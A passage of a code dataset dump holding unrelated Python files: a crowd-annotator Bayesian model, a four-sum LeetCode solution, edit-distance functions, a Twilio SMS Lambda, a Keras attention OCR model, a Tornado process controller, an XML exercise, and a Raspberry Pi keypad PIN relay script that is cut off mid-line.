E_t, C, doc_start, nscores):\n pass\n\n\n def update_post_alpha_data(self, model_idx, E_t, C, doc_start, nscores):\n pass\n\n\n def read_lnPi(self, l, C, Cprev, Krange, nscores, blanks):\n return self._read_lnPi(self.lnPi, l, C, Cprev, Krange, nscores, blanks)\n\n\n def read_lnPi_data(self, l, C, Cprev, nscores, model_idx):\n return self._read_lnPi(self.lnPi_data[model_idx], l, C, Cprev, 0, nscores, None)\n\n\n def read_lnEPi(self, l, C, Cprev, Krange, nscores, blanks):\n lnEPi = self.lnEPi()\n return self._read_lnPi(lnEPi, l, C, Cprev, Krange, nscores, blanks)\n\n\n def read_lnEPi_data(self, l, C, Cprev, nscores, model_idx):\n lnEPi_data = self.lnEPi_data()\n return self._read_lnPi(lnEPi_data[model_idx], l, C, Cprev, 0, nscores, None)\n\n\n def _read_lnPi(self, lnPi, l, C, Cprev, workeridxs, nscores, blanks):\n pass\n\n\n def q_pi(self):\n self.lnPi = self._calc_q_pi(self.alpha)\n\n\n def q_pi_data(self, model_idx):\n self.lnPi_data[model_idx] = self._calc_q_pi(self.alpha_data[model_idx])\n\n def _calc_q_pi(self, alpha):\n pass\n\n\n def lnEPi(self):\n EPi = self._calc_EPi(self.alpha)\n\n lnEPi = np.zeros_like(EPi)\n lnEPi[EPi != 0] = np.log(EPi[EPi != 0])\n lnEPi[EPi == 0] = -np.inf\n\n return lnEPi\n\n\n def lnEPi_data(self):\n if len(self.alpha0_data) == 0:\n return 0\n\n lnEPi_data = []\n\n for midx, _ in enumerate(self.alpha_data):\n EPi_m = self._calc_EPi(self.alpha_data[midx])\n lnEPi_m = np.zeros_like(EPi_m)\n lnEPi_m[EPi_m != 0] = np.log(EPi_m[EPi_m != 0])\n lnEPi_m[EPi_m == 0] = -np.inf\n lnEPi_data.append(lnEPi_m)\n\n return lnEPi_data\n\n\n def annotator_accuracy(self):\n if self.alpha.ndim == 3:\n annotator_acc = self.alpha[np.arange(self.L), np.arange(self.L), :] \\\n / np.sum(self.alpha, axis=1)\n elif self.alpha.ndim == 2:\n annotator_acc = self.alpha[1, :] / np.sum(self.alpha[:2, :], axis=0)\n elif self.alpha.ndim == 4:\n annotator_acc = np.sum(self.alpha, axis=2)[np.arange(self.L), np.arange(self.L), :] \\\n / np.sum(self.alpha, axis=(1,2))\n\n if self.beta.ndim == 2:\n beta = np.sum(self.beta, axis=0)\n else:\n beta = self.beta\n\n 
annotator_acc *= (beta / np.sum(beta))[:, None]\n        annotator_acc = np.sum(annotator_acc, axis=0)\n\n        return annotator_acc\n\n\n    def informativeness(self):\n\n        ptj = np.zeros(self.L)\n        for j in range(self.L):\n            ptj[j] = np.sum(self.beta0[:, j]) + np.sum(self.Et == j)\n\n        entropy_prior = -np.sum(ptj * np.log(ptj))\n\n        ptj_c = np.zeros((self.L, self.L, self.K))\n        for j in range(self.L):\n            if self.alpha.ndim == 4:\n                ptj_c[j] = np.sum(self.alpha[j, :, :, :], axis=1) / np.sum(self.alpha[j, :, :, :], axis=(0,1))[None, :] * ptj[j]\n            elif self.alpha.ndim == 3:\n                ptj_c[j] = self.alpha[j, :, :] / np.sum(self.alpha[j, :, :], axis=0)[None, :] * ptj[j]\n            else:\n                print('Warning: informativeness not defined for this annotator model.')\n\n        ptj_giv_c = ptj_c / np.sum(ptj_c, axis=0)[None, :, :]\n\n        entropy_post = -np.sum(ptj_c * np.log(ptj_giv_c), axis=(0,1))\n\n        return entropy_prior - entropy_post\n\n\ndef log_dirichlet_pdf(alpha, lnPi, sum_dim):\n    x = (alpha - 1) * lnPi\n    gammaln_alpha = gammaln(alpha)\n    invalid_alphas = np.isinf(gammaln_alpha) | np.isinf(x) | np.isnan(x)\n    gammaln_alpha[invalid_alphas] = 0 # these possibilities should be excluded\n    x[invalid_alphas] = 0\n    x = np.sum(x, axis=sum_dim)\n    z = gammaln(np.sum(alpha, sum_dim)) - np.sum(gammaln_alpha, sum_dim)\n    if not np.isscalar(z):\n        z[np.isinf(z)] = 0\n    return np.sum(x + z)","sub_path":"src/bsc/annotator_model.py","file_name":"annotator_model.py","file_ext":"py","file_size_in_byte":4049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"599993254","text":"\"\"\"\n    Given an array nums containing n integers and a target value target, determine whether there are four elements a, b, c and d in nums such that a + b + c + d equals target.\n    Find all unique quadruplets that satisfy the condition.\n    Note:\n        The answer must not contain duplicate quadruplets.\n    Example:\n        Given the array nums = [1, 0, -1, 0, -2, 2] and target = 0.\n        The set of quadruplets satisfying the requirement is:\n        [\n            [-1, 0, 0, 1],\n            [-2, -1, 1, 2],\n            [-2, 0, 0, 2]\n        ]\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n    def fourSum(self, nums: List[int], target: int) -> List[List[int]]:\n        pass\n\n    @classmethod\n    def solve_1(cls, nums: List[int], target: int) -> List[List[int]]:\n        nums.sort()\n\n        size = len(nums)\n        res = []\n\n        for i in range(size - 3):\n            if i > 0 and nums[i] == nums[i - 1]:\n                continue\n            if nums[i] + nums[i + 1] + nums[i + 2] + nums[i + 3] > target:\n                break\n            if nums[i] + nums[size - 1] + nums[size - 2] + nums[size - 3] < target:\n                continue\n\n            for j in range(i + 1, size - 2):\n                if j - i > 1 and nums[j] == nums[j - 1]:\n                    continue\n                if nums[i] + nums[j] + nums[j + 1] + nums[j + 2] > target:\n                    break\n                if nums[i] + nums[j] + nums[size - 2] + nums[size - 1] < target:\n                    continue\n\n                left = j + 1\n                right = size - 1\n\n                while left < right:\n                    check_target = nums[i] + nums[j] + nums[left] + nums[right]\n                    if check_target == target:\n                        res.append([nums[i], nums[j], nums[left], nums[right]])\n                        while left < right and nums[left] == nums[left + 1]:\n                            left += 1\n\n                        while left < right and nums[right] == nums[right - 1]:\n                            right -= 1\n\n                        left += 1\n                        right -= 1\n                    elif check_target > target:\n                        right -= 1\n                    else:\n                        left += 1\n        return res\n\n\nif __name__ == '__main__':\n    print(Solution().solve_1([1, 0, -1, 0, -2, 2], 0))\n","sub_path":"algorithm/LeetCode_18_四数之和.py","file_name":"LeetCode_18_四数之和.py","file_ext":"py","file_size_in_byte":2310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"268041685","text":"import random, time, sys\n\ndef create_random_line(size):\n    str1 = \"\"\n    str2 = \"\"\n\n    random.seed()\n    size1 = size2 = size\n\n    for i in range (size1):\n        str1 += chr(random.randint(32, 
126))\n\n for i in range (size2):\n str2 += chr(random.randint(32, 126))\n\n return str1, str2\n\ndef print_matrix(mat):\n print(\"\")\n for i in range (len(mat)):\n print(mat[i])\n\ndef create_matrix(weight, height):\n res = []\n for i in range (len(height) + 1):\n res.append([0]*(len(weight) + 1))\n\n return res\n\ndef compare():\n for i in range(2, 11):\n print(i)\n str1, str2 = create_random_line(i)\n #---------------------------\n time_start = time.process_time()\n\n for i in range(1000):\n lev_mat(str1, str2)\n\n time_end = time.process_time()\n print('{:.7f}'.format((time_end - time_start)/1000))\n #---------------------------\n time_start = time.process_time()\n\n for i in range(1000):\n d_lev_mat(str1, str2)\n\n time_end = time.process_time()\n print('{:.7f}'.format((time_end - time_start)/1000))\n # ---------------------------\n time_start = time.process_time()\n\n for i in range(1000):\n d_lev_rec(str1, str2)\n\n time_end = time.process_time()\n print('{:.7f}'.format((time_end - time_start)/1000))\n\ndef lev_mat(str1, str2, output = False):\n if len(str1) and len(str2):\n matrix = create_matrix(str1, str2)\n\n for i in range (1, len(matrix)):\n matrix[i][0] = matrix[i-1][0] + 1\n\n for i in range (1, len(matrix[0])):\n matrix[0][i] = matrix[0][i-1] + 1\n\n for i in range (1, len(str2) + 1):\n for j in range (1, len(str1) + 1):\n penalty = matrix[i-1][j-1]\n if str1[j-1] != str2[i-1]:\n penalty += 1\n penalty = min(penalty, matrix[i][j-1] + 1, matrix[i-1][j] + 1)\n\n matrix[i][j] = penalty\n\n d = matrix[len(matrix) - 1][len(matrix[0]) - 1]\n if output:\n print_matrix(matrix)\n elif not len(str1) and not len(str2):\n d = 0\n else:\n if len(str1):\n d = len(str1)\n else:\n d = len(str2)\n\n return d\n\ndef d_lev_rec(str1, str2):\n # global mem_rec\n # global count\n #\n # count +=1\n\n if not (len(str1) or len(str2)):\n return 0\n elif not (len(str1) and len(str2)):\n if len(str1):\n return len(str1)\n else:\n return len(str2)\n\n # mem_rec += 2*sys.getsizeof(str1[:-1])\n # mem_rec += 2*sys.getsizeof(str2[:-1])\n d1 = d_lev_rec(str1, str2[:-1]) + 1\n d2 = d_lev_rec(str1[:-1], str2) + 1\n d3 = d_lev_rec(str1[:-1], str2[:-1])\n if str1[-1] != str2[-1]:\n d3 += 1\n\n d4 = 0\n if len(str1) > 1 and len(str2) > 1:\n if str1[-1] == str2[-2] and str1[-2] == str2[-1]:\n # mem_rec += sys.getsizeof(str1[:-2])\n # mem_rec += sys.getsizeof(str2[:-2])\n d4 = d_lev_rec(str1[:-2], str2[:-2]) + 1\n\n if not d4:\n res = min(d1, d2, d3)\n else:\n res = min(d1, d2, d3, d4)\n\n return res\n\ndef d_lev_mat(str1, str2, output = False):\n # global mem_mat\n\n if len(str1) and len(str2):\n matrix = create_matrix(str1, str2)\n\n for i in range (1, len(matrix)):\n matrix[i][0] = matrix[i-1][0] + 1\n\n for i in range (1, len(matrix[0])):\n matrix[0][i] = matrix[0][i-1] + 1\n\n for i in range (1, len(str2) + 1):\n for j in range (1, len(str1) + 1):\n penalty = matrix[i-1][j-1]\n if str1[j-1] != str2[i-1]:\n penalty += 1\n penalty = min(penalty, matrix[i][j-1] + 1, matrix[i-1][j] + 1)\n if i > 1 and j > 1:\n if str1[j-1] == str2[i-2] and str2[i-1] == str1[j-2]:\n penalty = min(penalty, matrix[i-2][j-2] + 1)\n\n matrix[i][j] = penalty\n\n d = matrix[len(matrix) - 1][len(matrix[0]) - 1]\n # mem_mat += len(matrix)*len(matrix[0])*sys.getsizeof(matrix[0][0])\n # mem_mat += 2*sys.getsizeof(d)\n if output:\n print_matrix(matrix)\n elif not len(str1) and not len(str2):\n d = 0\n else:\n if len(str1):\n d = len(str1)\n else:\n d = len(str2)\n\n return d\n\nstring1 = input(\"first string to compare: \")\nstring2 = 
input(\"second string to compare: \")\n\nprint(\"string1: (\", string1, \") \", len(string1))\nprint(\"string2: (\", string2, \") \", len(string2))\n\nmem_rec = 0\nmem_mat = 0\ncount = 0\n\nd_mat = lev_mat(string1, string2, True)\nprint(\"levenstein matrix \", d_mat)\n\nd_d_l_mat = d_lev_mat(string1, string2, True)\nprint(\"damerau-levenstein matrix \", d_d_l_mat)\n\nd_d_l_rec = d_lev_rec(string1, string2)\nprint(\"damerau-levenstein recurent \", d_d_l_rec)\n\n# print(\"\\nMemory recurse: {0} + (memory in stack for 1 call)*{1}\".format(mem_rec, count))\n# print(\"Memory not recurse: {0} + (memory in stack for 1 call)*1\".format(mem_mat + sys.getsizeof(string1) + sys.getsizeof(string2)))\n\n# compare()\n\n","sub_path":"anal/levenshtein.py","file_name":"levenshtein.py","file_ext":"py","file_size_in_byte":5121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"405230997","text":"import base64\nimport json\nimport os\nimport urllib\nfrom urllib import request, parse\n\nTWILIO_SMS_URL = \"https://api.twilio.com/2010-04-01/Accounts/{}/Messages.json\"\nTWILIO_ACCOUNT_SID = os.environ.get(\"TWILIO_ACCOUNT_SID\")\nTWILIO_AUTH_TOKEN = os.environ.get(\"TWILIO_AUTH_TOKEN\")\n\ndef lambda_handler(event, context):\n try:\n queryPhone = event['queryStringParameters']['phone']\n lat = event['queryStringParameters']['lat']\n long = event['queryStringParameters']['long']\n except:\n responseErr = {}\n responseErr[\"statusCode\"] = 400\n return responseErr\n to_number = '+1' + queryPhone\n from_number = \"+18573228013\"\n locals_list = ''\n # insert Twilio Account SID into the REST API URL\n req = request.Request(\"https://po4sn5eftg.execute-api.us-east-2.amazonaws.com/nearby?longitude=%s&latitude=%s\" % (str(long), str(lat)))\n try:\n # perform HTTP POST request\n with request.urlopen(req) as f:\n locals_list = str(f.read().decode('utf-8'))\n except Exception as e:\n # something went wrong!\n return e\n locals_list = json.loads(locals_list)\n text_message = \"Nearby Landmarks:\\n\" \n found = False\n for element in locals_list[\"landmarks\"]:\n if int(element[\"rating\"]) >= 4.0:\n text_message += element[\"name\"] + \" (%s) - %.1f/5.0\\n\" % (element[\"types\"][0].replace(\"_\", \" \"), element[\"rating\"])\n found = True\n break\n if found == False:\n return \"No Nearby Landmarks\"\n body = text_message\n if not TWILIO_ACCOUNT_SID:\n return \"Unable to access Twilio Account SID.\"\n elif not TWILIO_AUTH_TOKEN:\n return \"Unable to access Twilio Auth Token.\"\n elif not to_number:\n return \"The function needs a 'To' number in the format +12023351493\"\n elif not from_number:\n return \"The function needs a 'From' number in the format +19732644156\"\n elif not body:\n return \"The function needs a 'Body' message to send.\"\n # insert Twilio Account SID into the REST API URL\n populated_url = TWILIO_SMS_URL.format(TWILIO_ACCOUNT_SID)\n post_params = {\"To\": to_number, \"From\": from_number, \"Body\": body}\n # encode the parameters for Python's urllib\n data = parse.urlencode(post_params).encode()\n req = request.Request(populated_url)\n # add authentication header to request based on Account SID + Auth Token\n authentication = \"{}:{}\".format(TWILIO_ACCOUNT_SID, TWILIO_AUTH_TOKEN)\n base64string = base64.b64encode(authentication.encode('utf-8'))\n req.add_header(\"Authorization\", \"Basic %s\" % base64string.decode('ascii'))\n try:\n # perform HTTP POST request\n with request.urlopen(req, data) as f:\n print(\"Twilio returned 
{}\".format(str(f.read().decode('utf-8'))))\n    except Exception as e:\n        # something went wrong!\n        return e\n    return \"SMS sent successfully!\"\n","sub_path":"backend/lambda/sendsms.py","file_name":"sendsms.py","file_ext":"py","file_size_in_byte":2900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"293284680","text":"from tensorflow.python.keras.layers import Bidirectional,Input, GRU, Dense, Concatenate, TimeDistributed\nfrom tensorflow.python.keras.models import Model\nfrom tensorflow.python.keras.optimizers import Adam\nimport tensorflow as tf\nfrom layers.conv import Conv\nfrom layers.attention import AttentionLayer\nimport logging\nfrom utils.logger import _p\nlogger = logging.getLogger(\"Model\")\n\n\n# y_pred is [batch,seq,charset_size]\n# Tested the details of this function; see: test/test_accuracy.py\n# But this is computed for one batch; for the multiple batches during validation,\n# whether it is also averaged over those batches is a detail I am not sure about....?\n# 2020.3.19, the first dimension of y_pred is batch, see: https://stackoverflow.com/questions/46663013/what-is-y-true-and-y-pred-when-creating-a-custom-metric-in-keras\ndef words_accuracy(y_true, y_pred):\n    # logger.debug(\"DEBUG@@@, look at the shape of y_pred: %r\",K.int_shape(y_pred))\n    # The debugging result is ======>(None, None, 3864)\n    # The first dimension is the batch and the third is the vocabulary size, but what is the second?\n    #\n    # y_pred = _p(y_pred,\"DEBUG@@@, shape of the y_pred argument of words_accuracy at runtime\")\n    # At runtime, the shape of the y_pred argument of words_accuracy is [2 29 3864]\n    # So y_pred is [batch, seq_len, vocabulary_size]\n    # Checked by debugging; no problem\n\n    max_idx_p = tf.argmax(y_pred, axis=2)\n    max_idx_l = tf.argmax(y_true, axis=2)\n    max_idx_p = _p(max_idx_p,\"@@@, predicted values\")\n    max_idx_l = _p(max_idx_l, \"@@@, label values\")\n    correct_pred = tf.equal(max_idx_p, max_idx_l)\n    correct_pred = _p(correct_pred, \"@@@, words_accuracy (char-by-char)\")\n    _result = tf.map_fn(fn=lambda e: tf.reduce_all(e), elems=correct_pred, dtype=tf.bool)\n    _result = _p(_result, \"@@@, words_accuracy (word-by-word)\")\n    result = tf.reduce_mean(tf.cast(_result, tf.float32))\n    result = _p(result, \"@@@, words_accuracy accuracy rate\")\n    return result\n\n\ndef train_model(conf,args):\n\n    conv,input_image = Conv().build()\n\n    encoder_bi_gru = Bidirectional(GRU(conf.GRU_HIDDEN_SIZE,\n                                       return_sequences=True,\n                                       return_state=True,\n                                       name='encoder_gru'),\n                                   name='bidirectional_encoder')\n\n    # TODO: cannot figure out how to stack two bi-GRUs; dropping it for now and moving on, to be revisited later\n    # encoder_bi_gru2 = Bidirectional(GRU(conf.GRU_HIDDEN_SIZE,\n    #                                     return_sequences=True,\n    #                                     return_state=True,\n    #                                     name='encoder_gru'),\n    #                                 input_shape=( int(conf.INPUT_IMAGE_WIDTH/4) ,512),\n    #                                 name='bidirectional_encoder')\n\n    encoder_out, encoder_fwd_state, encoder_back_state = encoder_bi_gru(conv)\n    encoder_fwd_state = _p(encoder_fwd_state, \"Encoder output fwd state%%%%%%%%%%%%%%%%%%%%%%%%%%%\")\n    encoder_back_state = _p(encoder_back_state, \"Encoder output back state%%%%%%%%%%%%%%%%%%%%%%%%%%%\")\n\n    decoder_inputs = Input(shape=(None,conf.CHARSET_SIZE), name='decoder_inputs')\n    decoder_gru = GRU(units=conf.GRU_HIDDEN_SIZE*2, return_sequences=True, return_state=True, name='decoder_gru')\n    decoder_initial_status = Concatenate(axis=-1)([encoder_fwd_state, encoder_back_state])\n    decoder_out, decoder_state = decoder_gru(decoder_inputs,initial_state=decoder_initial_status)\n\n    attn_layer = AttentionLayer(name='attention_layer')\n    logger.debug(\"Tensors passed to the model's attention call [encoder_out, decoder_out]:%r,%r\",encoder_out, decoder_out)\n    attn_out, attn_states = attn_layer([encoder_out, decoder_out]) # c_outputs, e_outputs\n\n    decoder_concat_input = Concatenate(axis=-1, name='concat_layer')([decoder_out, attn_out])\n    dense = Dense(conf.CHARSET_SIZE, activation='softmax', name='softmax_layer')\n    dense_time = 
TimeDistributed(dense, name='time_distributed_layer')\n\n    # decoder_concat_input = _p(decoder_concat_input, \"All states output by the encoder%%%%%%%%%%%%%%%%%%%%%%%%%%%\")\n    decoder_prob = dense_time(decoder_concat_input)\n\n    train_model = Model(inputs=[input_image, decoder_inputs], outputs=decoder_prob)\n    opt = Adam(lr=args.learning_rate)\n\n    # categorical_crossentropy is mainly a loss for multi-class classification, but seq2seq is not just one result; it is seq_length multi-class problems, so can categorical_crossentropy still be used?\n    # The answer to this question can be seen in this example: https://keras.io/examples/lstm_seq2seq/\n    # My guess is that the Keras code checks for this; with multiple categorical_crossentropy terms it presumably applies K.reduce_mean()...\n    train_model.compile(optimizer=opt, loss='categorical_crossentropy', metrics=[words_accuracy])\n\n    train_model.summary()\n\n    return train_model\n\ndef infer_model(model,conf):\n    # Encoder\n    encoder_inputs = model.input[0] # encoder input\n    bidirectional_encoder = model.get_layer(\"bidirectional_encoder\")\n    encoder_outputs, state_f_enc, state_b_enc = bidirectional_encoder.output\n    encoder_state = Concatenate(axis=-1, name='encoder_state')([state_f_enc, state_b_enc])\n    encoder_model = Model(encoder_inputs, [encoder_outputs,encoder_state])\n\n    # Decoder\n    decoder_inputs = model.input[1] # decoder input\n    decoder_init_state = Input(shape=(2*conf.GRU_HIDDEN_SIZE,), name='initial_status')\n    encoder_states = Input(shape=(conf.FEATURE_MAP_WIDTH,conf.GRU_HIDDEN_SIZE*2,), name='encoder_states')\n\n    decoder_gru = model.get_layer(\"decoder_gru\")\n    decoder_outputs, decoder_state = decoder_gru(decoder_inputs, initial_state=decoder_init_state)\n\n    attention_layer = model.get_layer(\"attention_layer\")\n    attention_outputs,attention_prob = attention_layer([encoder_states,decoder_outputs])\n\n    concat_outputs = Concatenate(axis=-1, name='concat_layer')([decoder_outputs, attention_outputs])\n\n    decoder_dense = model.get_layer(\"time_distributed_layer\")\n    decoder_outputs = decoder_dense(concat_outputs)\n\n    decoder_model = Model(\n        [decoder_inputs,encoder_states,decoder_init_state],\n        [decoder_outputs,attention_prob,decoder_state])\n    return encoder_model,decoder_model","sub_path":"layers/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"12372886","text":"\"\"\"The Tinman Controller class uses clihelper for most of the main\nfunctionality with regard to configuration, logging and daemonization. Spawns a\ntornado.HTTPServer and Application per port using multiprocessing.\n\n\"\"\"\nimport clihelper\nimport logging\nimport multiprocessing\nimport os\nimport signal\nimport sys\nimport time\nfrom tornado import version as tornado_version\n\n\n# Tinman Imports\nfrom tinman import __desc__\nfrom tinman import __version__\nfrom tinman import config\nfrom tinman import process\n\n# Additional required configuration keys\nREQUIRED_CONFIG_KEYS = [config.HTTP_SERVER, config.ROUTES]\nMAX_SHUTDOWN_WAIT = 2\nSHUTDOWN_SLEEP_INTERVAL = 0.25\n\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass Controller(clihelper.Controller):\n    \"\"\"Main application controller class. 
Responsible for spawning all of the\n HTTPServer / Applications.\n\n \"\"\"\n def __init__(self, options, arguments):\n \"\"\"Create a new instance of the Controller class\n\n :param optparse.Values options: CLI Options\n :param list arguments: Additional CLI arguments\n\n \"\"\"\n super(Controller, self).__init__(options, arguments)\n self.children = list()\n self.manager = multiprocessing.Manager()\n self.manager.child_stats = list()\n self.manager.config = self.config\n self.manager.debug = self._debug\n self.manager.options = options\n\n @property\n def config_base_path(self):\n return self.application_config.get(config.PATHS,\n dict()).get(config.BASE)\n\n def create_process(self, port):\n \"\"\"Create an Application and HTTPServer for the given port.\n\n :param int port: The port to listen on\n :rtype: multiprocessing.Process\n\n \"\"\"\n LOGGER.info('Creating HTTPServer and Application on port %i', port)\n return process.Process(name=\"ServerProcess.%i\" % port,\n kwargs={'manager': self.manager,\n 'port': port})\n\n @property\n def http_server_config(self):\n \"\"\"Return the HTTPServer configuration\n\n :rtype: dict\n\n \"\"\"\n return self._config[config.HTTP_SERVER]\n\n def insert_base_path(self):\n \"\"\"Inserts a base path into the sys.path list if one is specified in\n the configuration.\n\n \"\"\"\n if hasattr(self._options, 'path') and self._options.path:\n self.set_base_path(self._options.path)\n if self.config_base_path:\n LOGGER.debug('Appending %s to the sys.path list',\n self.config_base_path)\n self.insert_path(self.config_base_path)\n\n def insert_path(self, path):\n \"\"\"Insert a path into the Python system paths.\n\n \"\"\"\n sys.path.insert(0, path)\n\n @property\n def living_children(self):\n return [child for child in self.children if child.is_alive()]\n\n def set_base_path(self, value):\n \"\"\"Munge in the base path into the configuration values\n\n :param str value: The path value\n\n \"\"\"\n if config.PATHS not in self._config[config.APPLICATION]:\n self._config[config.APPLICATION][config.PATHS] = dict()\n self._config[config.APPLICATION][config.PATHS][config.BASE] = value\n\n def reload_configuration(self):\n \"\"\"Reload the configuration via clihelper.Controller and then notify\n children up the update\n\n \"\"\"\n super(Controller, self).reload_configuration()\n for child in self.living_children:\n if child.pid != os.getpid():\n os.kill(child.pid, signal.SIGHUP)\n\n def setup(self):\n \"\"\"Additional setup steps.\"\"\"\n LOGGER.info('Tinman v%s starting up with Tornado v%s',\n __version__, tornado_version)\n self.insert_base_path()\n self.start_children()\n\n def start_children(self):\n \"\"\"Start the child processes\"\"\"\n for port in self.http_server_config['ports']:\n child = self.create_process(port)\n child.start()\n self.children.append(child)\n\n def stop(self):\n \"\"\"Called when the application is shutting down, notify the child\n processes and loop until they are shutdown.\n\n \"\"\"\n self.set_state(self.STATE_STOPPING)\n\n # Signal Children to Stop\n LOGGER.info('Stopping child processes')\n for child in self.living_children:\n child.terminate()\n\n # Loop while children are alive\n LOGGER.info('Waiting for all child processes to die')\n start_time = time.time()\n while self.living_children:\n time.sleep(SHUTDOWN_SLEEP_INTERVAL)\n if time.time() - start_time >= MAX_SHUTDOWN_WAIT:\n LOGGER.info('All children did not stop in time')\n break\n\n if self.living_children:\n LOGGER.info('Killing child processes')\n for child in 
self.living_children:\n if child.pid != os.getpid():\n os.kill(child.pid, signal.SIGKILL)\n\n # Note that the shutdown process is complete\n self._stopped()\n\n\ndef add_required_config_keys():\n \"\"\"Add each of the items in the _REQUIRED_CONFIG_KEYS to the\n clihelper._CONFIG_KEYS for validation of the configuration file. If one of\n the items is not present in the config file, an exception will be thrown\n and the application will be shutdown.\n\n \"\"\"\n [clihelper.add_config_key(key) for key in REQUIRED_CONFIG_KEYS]\n\n\ndef setup_options(parser):\n \"\"\"Called by the clihelper._cli_options method if passed to the\n Controller.run method.\n\n \"\"\"\n parser.add_option(\"-n\", \"--newrelic\",\n action=\"store\",\n dest=\"newrelic\",\n default=None,\n help=\"Path to newrelic.ini to enable NewRelic \"\n \"instrumentation\")\n parser.add_option(\"-p\", \"--path\",\n action=\"store\",\n dest=\"path\",\n default=None,\n help=\"Path to prepend to the Python system path\")\n\n\ndef main():\n \"\"\"Invoked by the script installed by setuptools.\"\"\"\n clihelper.setup('tinman', __desc__, __version__)\n add_required_config_keys()\n clihelper.run(Controller, setup_options)\n","sub_path":"tinman/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":6329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"498708775","text":"import urllib.request as ur\nimport xml.etree.ElementTree as ET\nimport re\n\nserviceurl = 'http://python-data.dr-chuck.net/comments_229357.xml'\nprint (serviceurl)\nurlopen = ur.urlopen(serviceurl)\ndata = urlopen.read()\ntree = ET.fromstring(data)\ncounts = tree.findall('.//count')\n#print (counts.text)\nprint('total counts: ', len(counts))\n#counts = [int (i) for i in counts]\n#counts = sum(counts)\ntotalvalues = []\nfor i in counts:\n values = i.text\n totalvalues.append(values)\n#print (totalvalues)\ntotalvalues = [int(x) for x in totalvalues]\ntotalvalues = sum(totalvalues)\nprint(totalvalues)\n\n\n\n\n\n\n\n \n \n\n","sub_path":"xml_assignment.py","file_name":"xml_assignment.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"524248013","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nThis Python script activate_relay_via_pin_code.py implements a relay activation mechanism\nonly after successful authentication via PIN code that inserted with the key pad.\n\nMIT License\n\nRaspberry Pi - Access via Smart Card TS-CNS\n\nCopyright (c) 2020 Antonio Musarra's Blog - https://www.dontesta.it\n\nPermission is hereby granted, free of charge, to any person obtaining a copy of\nthis software and associated documentation files (the \"Software\"), to deal in the\nSoftware without restriction, including without limitation the rights to use,\ncopy, modify, merge, publish, distribute, sublicense, and/or sell copies of the\nSoftware, and to permit persons to whom the Software is furnished to do so,\nsubject to the following conditions:\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,\nWHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN\nCONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\"\"\"\n\n__author__ = \"Antonio Musarra\"\n__copyright__ = \"Copyright 2020 Antonio Musarra's Blog\"\n__credits__ = [\"Antonio Musarra\"]\n__version__ = \"1.0.0\"\n__license__ = \"MIT\"\n__maintainer__ = \"Antonio Musarra\"\n__email__ = \"antonio.musarra@gmail.com\"\n__status__ = \"Development\"\n\nfrom pad4pi import rpi_gpio\nfrom modules.PCF8574 import PCF8574_GPIO\nfrom modules.Adafruit_LCD1602 import Adafruit_CharLCD\n\nimport RPi.GPIO as GPIO\nimport time\nimport sys\n\n# Check I2C address via command i2cdetect -y 1\nPCF8574_address = 0x27 # I2C address of the PCF8574 chip.\nPCF8574A_address = 0x3F # I2C address of the PCF8574A chip.\n\n# Create PCF8574 GPIO adapter.\ntry:\n mcp = PCF8574_GPIO(PCF8574_address)\nexcept:\n try:\n mcp = PCF8574_GPIO(PCF8574A_address)\n except:\n print('I2C Address Error !')\n exit(1)\n\n# Create LCD, passing in MCP GPIO adapter.\nlcd = Adafruit_CharLCD(pin_rs=0, pin_e=2, pins_db=[4, 5, 6, 7], GPIO=mcp)\n\nKEYPAD = [\n [1, 2, 3, \"A\"],\n [4, 5, 6, \"B\"],\n [7, 8, 9, \"C\"],\n [\"*\", 0, \"#\", \"D\"]\n]\n\nROW_PINS = [18, 12, 20, 21] # BCM numbering\nCOL_PINS = [10, 22, 27, 17] # BCM numbering\n\n# Dictionary of relationship between relay identification and BCM pin\ndict_relay_bcm = {\n 1: 23,\n 2: 24,\n 3: 25,\n 4: 16\n}\n\nentered_pin = \"\"\nentered_pin_is_ok = False\ncorrect_pin = \"1234\"\n\n\n# Activate the relay\ndef activate_relay(relay_id):\n if 1 <= relay_id <= 4:\n lcd.clear()\n lcd.message(\"Activate Relay \" + str(relay_id) + \"\\n\")\n lcd.message(\"Press C to exit\")\n\n GPIO.output(dict_relay_bcm[relay_id], GPIO.LOW)\n\n print(f\"Activate Relay {str(relay_id)}\")\n\n\n# Check entered PIN code\ndef check_pin(key):\n global entered_pin, correct_pin\n\n if len(entered_pin) == len(correct_pin) or key == \"#\":\n if entered_pin == correct_pin:\n correct_pin_entered()\n else:\n incorrect_pin_entered()\n\n\n# CleanUp the resources\ndef cleanup():\n global keypad\n\n lcd.clear()\n lcd.message(\"Goodbye...\\n\")\n lcd.backlight = False\n keypad.cleanup()\n\n\n# Display info on corrected PIN code and exit\ndef correct_pin_entered():\n global entered_pin_is_ok\n\n entered_pin_is_ok = True\n\n lcd.clear()\n lcd.message(\"Access granted\\n\")\n lcd.message(\"Accepted PIN\\n\")\n\n print(\"PIN accepted. Access 